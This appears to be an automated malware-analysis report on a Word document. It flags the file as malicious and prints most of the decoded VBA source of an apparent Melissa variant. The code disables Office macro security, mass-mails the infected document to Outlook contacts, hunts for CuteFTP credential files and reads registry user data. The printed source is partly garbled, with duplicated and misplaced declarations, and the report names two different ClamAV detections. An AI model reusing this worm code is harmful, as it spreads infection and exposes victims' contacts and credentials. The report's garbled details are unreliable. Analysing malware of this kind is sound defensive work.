Verdict: MALICIOUS
Risk Score: 260

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample contains VBA macros, specifically a Document_Open macro that attempts to disable security features and spread itself. The ClamAV detection 'Doc.Trojan.Melissa-1' strongly suggests this is a variant of the Melissa virus, which is known for its email-spreading capabilities. The macro attempts to modify registry keys related to Office security settings.
Heuristics (5)

- ClamAV: Win.Trojan.Psycho-3 (critical) [CLAMAV_DETECTION]: ClamAV detected this file as malware: Win.Trojan.Psycho-3
- VBA macros detected (medium, 3 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code
- Document_Open macro (high) [OLE_VBA_DOCOPEN]: Document_Open macro
- CreateObject call (high) [OLE_VBA_CREATEOBJ]: CreateObject call
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 28807 bytes |

SHA-256: 0b628a7d56a0e68f5af94fca52d2cd05d98d6770dc6c9174a402ad0691f4b3cf
Detection (ClamAV): Doc.Trojan.Melissa-1
Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "MelissaFX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegSetValueExLong Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpValue As Long, ByVal cbData As Long) As Long
Private Declare Function RegSetValueExString Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpValue As String, ByVal cbData As Long) As Long
Set prevDocument = ActiveDocument
Set nextDocument = NormalTemplate
Private Sub Document_Open()
Randomize
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (5 - 5): Options.VirusProtection = (5 - 5): Options.SaveNormalPrompt = (5 - 5)
End If
ShareDriveC
DisableCtrlAltDelete (True)
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "MelissaFX") <> 1 Then _
DoMail (Int(Rnd * 30) + 30) / 100, True
DoInf
DisableCtrlAltDelete (False)
End Sub
Private Function DisableCtrlAltDelete(bDisabled As Boolean)
x = SystemParametersInfo(97, bDisabled, CStr(1), 0)
End Function
Private Function DoMail(Percent, Info As Boolean)
Dim UDasOutlook, DasMapiName, MyMail, MyInfo, oFolder
Set UDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UDasOutlook.GetNamespace("MAPI")
If UDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
Set MyMail = UDasOutlook.CreateItem(0)
TotList = AddyBook.AddressEntries.Count
If TotList > 10 Then
TotMail = Int(TotList * Percent)
tmp = TotMail - 1
AdrBegin = Int(Rnd * (TotList - tmp)) + 1
AdrStop = AdrBegin + tmp
Else
AdrBegin = 1
AdrStop = TotList
End If
For x = AdrBegin To AdrStop
EAdr = AddyBook.AddressEntries(x)
MyMail.Recipients.Add EAdr
Next x
Set oFolder = DasMapiName.GetDefaultFolder(6)
RNItem = Int(Rnd * oFolder.items.Count) + 1
With MyMail
.Attachments.Add ActiveDocument.FullName
.Importance = Int(Rnd * 2) + 1
.DeleteAfterSubmit = True
If oFolder.items.Count > 0 And Int(Rnd * 3) + 1 > 1 Then _
.body = oFolder.items(RNItem).body
.Subject = SmartSubj
.Send
End With
Next y
If Info = True Then
DefltCuteFTP = "c:\progra~1\cuteftp\tree.dat"
If Dir(DefltCuteFTP) = "" Then
With Application.FileSearch
.FileName = "tree.dat"
.LookIn = "c:\progra~1\"
.SearchSubFolders = True
.Execute
CuteFTP = .FoundFiles(1)
End With
Else
CuteFTP = DefltCuteFTP
End If
If CuteFTP <> "" Then
tmpkey = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion"
tmpkey2 = "HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\"
Usr = System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Network\Logon", "Username")
PC = System.PrivateProfileString("", tmpkey2 & "ComputerName\ComputerName", "ComputerName")
Org = System.PrivateProfileString("", tmpkey, "RegisteredOrganization")
... (truncated)
```